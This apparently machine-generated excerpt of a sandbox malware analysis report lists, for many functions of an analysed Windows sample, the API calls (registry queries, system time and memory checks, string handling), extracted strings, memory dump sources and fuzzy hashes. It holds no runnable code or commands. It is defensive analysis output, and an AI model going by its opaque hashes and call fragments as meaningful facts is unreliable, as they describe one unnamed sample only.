                          • Opcode Fuzzy Hash: d4fee298843e57f01fa3194cb9889c29df931d3c4cf17808a4621938624742e2
                          • Instruction Fuzzy Hash: 91114C71600729EFEB10DFA9ED88AAB736DFB44346F100259F901A6280EB749D00CBB0
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00645B14
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A188
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A1AE
                          • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00645B7C
                          • memmove.MSVCRT(00000000,?,?), ref: 00645B89
                          • memmove.MSVCRT(00000000,?,?), ref: 00645B98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long
                          • API String ID: 2052693487-3788999226
                          • Opcode ID: 16bec2eaba057808c1c3798de755747cc4d8b8e7814bf76896ddd0f028731cd7
                          • Instruction ID: b95e65290a48bf4caf0917ba257fb6dc3608a42dc79ca5881805cc72554e3f19
                          • Opcode Fuzzy Hash: 16bec2eaba057808c1c3798de755747cc4d8b8e7814bf76896ddd0f028731cd7
                          • Instruction Fuzzy Hash: 02416071A005199FCF08DF6CC991AAEBBB6EB89710F15826DE909E7745D630DD018B90
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00637D58
                            • Part of subcall function 0064A1C0: std::exception::exception.LIBCMT ref: 0064A1D5
                            • Part of subcall function 0064A1C0: std::exception::exception.LIBCMT ref: 0064A1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 00637D76
                          • std::_Xinvalid_argument.LIBCPMT ref: 00637D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$std::exception::exception
                          • String ID: invalid string position$string too long
                          • API String ID: 3310641104-4289949731
                          • Opcode ID: bc7c8b093621ab508a0be2aa2d957aff722a5707b99c3498af68e709c7d5a12c
                          • Instruction ID: d55a4e978bf0987c70bfcb216f58c9586dc95cf39f07f192465f7a52224fed8c
                          • Opcode Fuzzy Hash: bc7c8b093621ab508a0be2aa2d957aff722a5707b99c3498af68e709c7d5a12c
                          • Instruction Fuzzy Hash: 8221A2723042009BD730DE6CD881A7AF7E7EFA1761F204AAEE4568B741D771D84487E5
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006433EF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 006433F6
                          • GlobalMemoryStatusEx.KERNEL32 ref: 00643411
                          • wsprintfA.USER32 ref: 00643437
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB
                          • API String ID: 2922868504-2651807785
                          • Opcode ID: 1d6fbf47b4340e11c785e74e7731738a15f6dbbcb2f8afeed9c50200a79c214f
                          • Instruction ID: 4f610e17969a6b23bfcba88965991803a1340a9e08b9197df60dce22c10c7724
                          • Opcode Fuzzy Hash: 1d6fbf47b4340e11c785e74e7731738a15f6dbbcb2f8afeed9c50200a79c214f
                          • Instruction Fuzzy Hash: FD01D871A44714EFDB14DF98DD49BAEB7B9FB44711F000529F906E7380D778590086A5
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit$__getptdfree
                          • String ID: Xue$Xue
                          • API String ID: 2640026729-2768520164
                          • Opcode ID: 594b3d72c9cd50bd4251ac17915c9bf914279e80e0323d5d17bb2a6970b9c31d
                          • Instruction ID: 97cb3960334c59087bdec6adbc0dbc16d48566275bcee5bc3f324b5120c947df
                          • Opcode Fuzzy Hash: 594b3d72c9cd50bd4251ac17915c9bf914279e80e0323d5d17bb2a6970b9c31d
                          • Instruction Fuzzy Hash: 8601D232D95B11ABCB61AF28A4497DFB363BF04B11F140118E80067780CBA06E41DBE9
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,0129D148,00000000,00020119,?), ref: 0063D7F5
                          • RegQueryValueExA.ADVAPI32(?,0129D9D8,00000000,00000000,00000000,000000FF), ref: 0063D819
                          • RegCloseKey.ADVAPI32(?), ref: 0063D823
                          • lstrcat.KERNEL32(?,00000000), ref: 0063D848
                          • lstrcat.KERNEL32(?,0129DA08), ref: 0063D85C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: f50a23fb2e87fde723cc19db64eb27ffade1a46136120d62531be48c7b6babb5
                          • Instruction ID: d5fe31b5a6b8ce8020d3acf250078086ca00bc331d683c85fb201cf143a9acef
                          • Opcode Fuzzy Hash: f50a23fb2e87fde723cc19db64eb27ffade1a46136120d62531be48c7b6babb5
                          • Instruction Fuzzy Hash: E14191B1A1021CAFCB94EF64FC82BDE7779BF54304F0040A9B509A7251EE34AA858FD5
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00637F31
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00637F60
                          • StrCmpCA.SHLWAPI(00000000,00654C3C), ref: 00637FA5
                          • StrCmpCA.SHLWAPI(00000000,00654C3C), ref: 00637FD3
                          • StrCmpCA.SHLWAPI(00000000,00654C3C), ref: 00638007
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 71f78e2790b0b95bcab3d64e520b49b01b6cea977bb0b51590ea5d9f4d074b71
                          • Instruction ID: b9fe0a1de35db0a2a927eee73ba8e650669e7e86ccb4b1d60de3e49bc5b76900
                          • Opcode Fuzzy Hash: 71f78e2790b0b95bcab3d64e520b49b01b6cea977bb0b51590ea5d9f4d074b71
                          • Instruction Fuzzy Hash: 49417CB0A0421ADFCB20DF68D880EAEB7B6FF54300F11419DE8059B351DB75AA66CBD1
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 006380BB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006380EA
                          • StrCmpCA.SHLWAPI(00000000,00654C3C), ref: 00638102
                          • lstrlen.KERNEL32(00000000), ref: 00638140
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063816F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: aa126113d11a65a7e0253ea225047f04e6a9f8ab7929a0e552573a6a449f9f0c
                          • Instruction ID: f85fc970c9135b0702b6f9e6f1f256a098d15a768bffd104983f8a32c1f601d9
                          • Opcode Fuzzy Hash: aa126113d11a65a7e0253ea225047f04e6a9f8ab7929a0e552573a6a449f9f0c
                          • Instruction Fuzzy Hash: 2A415871A00206AFCB21DF68D984BEABBF6AB44700F15855DB849D7258EF38D946CB90
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00641B72
                            • Part of subcall function 00641820: lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0064184F
                            • Part of subcall function 00641820: lstrlen.KERNEL32(01286188), ref: 00641860
                            • Part of subcall function 00641820: lstrcpy.KERNEL32(00000000,00000000), ref: 00641887
                            • Part of subcall function 00641820: lstrcat.KERNEL32(00000000,00000000), ref: 00641892
                            • Part of subcall function 00641820: lstrcpy.KERNEL32(00000000,00000000), ref: 006418C1
                            • Part of subcall function 00641820: lstrlen.KERNEL32(00654FA0), ref: 006418D3
                            • Part of subcall function 00641820: lstrcpy.KERNEL32(00000000,00000000), ref: 006418F4
                            • Part of subcall function 00641820: lstrcat.KERNEL32(00000000,00654FA0), ref: 00641900
                            • Part of subcall function 00641820: lstrcpy.KERNEL32(00000000,00000000), ref: 0064192F
                          • sscanf.NTDLL ref: 00641B9A
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00641BB6
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00641BC6
                          • ExitProcess.KERNEL32 ref: 00641BE3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                          • String ID:
                          • API String ID: 3040284667-0
                          • Opcode ID: 97234738c51d43c3b0cf42f659a421f7d9905ed62e7bd638daf222d059acc65d
                          • Instruction ID: a925f1eaa08e3458727b03dd661adf513e96893a9dd747fe89af06da522c713e
                          • Opcode Fuzzy Hash: 97234738c51d43c3b0cf42f659a421f7d9905ed62e7bd638daf222d059acc65d
                          • Instruction Fuzzy Hash: D121F0B5408301EF8340DF69D88489BBBF9FFC8215F409E1EF599C3260E73496088BA6
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00643166
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0064316D
                          • RegOpenKeyExA.ADVAPI32(80000002,0128BAB8,00000000,00020119,?), ref: 0064318C
                          • RegQueryValueExA.ADVAPI32(?,0129D408,00000000,00000000,00000000,000000FF), ref: 006431A7
                          • RegCloseKey.ADVAPI32(?), ref: 006431B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 8ba4c49b6c37438c2ae7c9c1ea1cd882bd5a1788db181e89d62922d5a7c76129
                          • Instruction ID: 421c6a71f12936b1e886880a44e833407a37626a1a41f88489ccf7423a283c99
                          • Opcode Fuzzy Hash: 8ba4c49b6c37438c2ae7c9c1ea1cd882bd5a1788db181e89d62922d5a7c76129
                          • Instruction Fuzzy Hash: D5113076A40315EFD710CF94DD45BABBBBCF748712F00456AFA05E3680DB7959048BA1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: 6160142c4e5a1eacef826585e8f49c17d9dba2cdb18519c4bfe97b3e8db3c65f
                          • Instruction ID: ce29bf504a211851f9629d63f6602264e6023c0fab165b75d2842af91ef6bc37
                          • Opcode Fuzzy Hash: 6160142c4e5a1eacef826585e8f49c17d9dba2cdb18519c4bfe97b3e8db3c65f
                          • Instruction Fuzzy Hash: 4141F67054475CAEDB318B248C89FFB7BFE9B45304F1444E8E98687182E2719B458F34
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00628996
                            • Part of subcall function 0064A1C0: std::exception::exception.LIBCMT ref: 0064A1D5
                            • Part of subcall function 0064A1C0: std::exception::exception.LIBCMT ref: 0064A1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 006289CD
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A188
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: invalid string position$string too long
                          • API String ID: 2002836212-4289949731
                          • Opcode ID: 5afa85b7126ac066fa813f6bce196101143234857175634097253d12c500a0d0
                          • Instruction ID: 9c9e02a4bb302f16c2de769fd32baa732c9c5d51a6a2dcbef4c84496b4a8f739
                          • Opcode Fuzzy Hash: 5afa85b7126ac066fa813f6bce196101143234857175634097253d12c500a0d0
                          • Instruction Fuzzy Hash: A721F672701A208FC7209A5CFC40A6AF39BDBA17A1B15097FF141CB281CE71DC81CBA9
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00628883
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A188
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 76cb3d162a0efa405a456d31bdfad97f2509a712482f445c4485d0ee5f348449
                          • Instruction ID: 52575c6ca7b699f3b798faf2ab8c4e34b0721a241cea8d73d17085490988e9c2
                          • Opcode Fuzzy Hash: 76cb3d162a0efa405a456d31bdfad97f2509a712482f445c4485d0ee5f348449
                          • Instruction Fuzzy Hash: C431C7B5E005199FCB08DF58D8906AEBBB6EB88350F148269E905EF384DB30AD01CBD1
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00645922
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A188
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A1AE
                          • std::_Xinvalid_argument.LIBCPMT ref: 00645935
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_std::exception::exception
                          • String ID: Sec-WebSocket-Version: 13$string too long
                          • API String ID: 1928653953-3304177573
                          • Opcode ID: 92c1d63525ea8e0056cb47b0b35a8b2a40e8255c3f6926f16a9a658efed542b4
                          • Instruction ID: 8aa813d3d84f67836f104b7273703e7b2b1c9788b3e395e7c85343816789a215
                          • Opcode Fuzzy Hash: 92c1d63525ea8e0056cb47b0b35a8b2a40e8255c3f6926f16a9a658efed542b4
                          • Instruction Fuzzy Hash: 49118231304B80CBC7319B2CE80075977E3ABD1761F250AADE0D287796CB61D841C7A5
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0064A430,000000FF), ref: 00643D20
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00643D27
                          • wsprintfA.USER32 ref: 00643D37
                            • Part of subcall function 006471E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006471FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: c1d03ba105f0e1d345bfa36336cfd31e51c289bb175d9b6817bba30fa64d809b
                          • Instruction ID: 55eda4a9a24eb24824cd0fd4567d5b8cd7c934d283036ec024f47ae362e61938
                          • Opcode Fuzzy Hash: c1d03ba105f0e1d345bfa36336cfd31e51c289bb175d9b6817bba30fa64d809b
                          • Instruction Fuzzy Hash: 5701C071640B14FBE7105B54DC0AF6ABBA8FB45B62F100515FA05972D0DBB81900CBA1
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00628737
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A188
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: dff946dd96a559b2155d280f957dcb4930f3083d079f1509c8a776fe21f868f6
                          • Instruction ID: 43fc73e5bf03b356fd8cede2a5bffa5482f0beaeca7b777adaa4619d16e687f0
                          • Opcode Fuzzy Hash: dff946dd96a559b2155d280f957dcb4930f3083d079f1509c8a776fe21f868f6
                          • Instruction Fuzzy Hash: F9F0BE37F014321F8354A43DAD8449EA94796E539033AD765E81AEF399EC70EC829AD4
                          APIs
                            • Part of subcall function 0064781C: __mtinitlocknum.LIBCMT ref: 00647832
                            • Part of subcall function 0064781C: __amsg_exit.LIBCMT ref: 0064783E
                          • ___addlocaleref.LIBCMT ref: 00648756
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
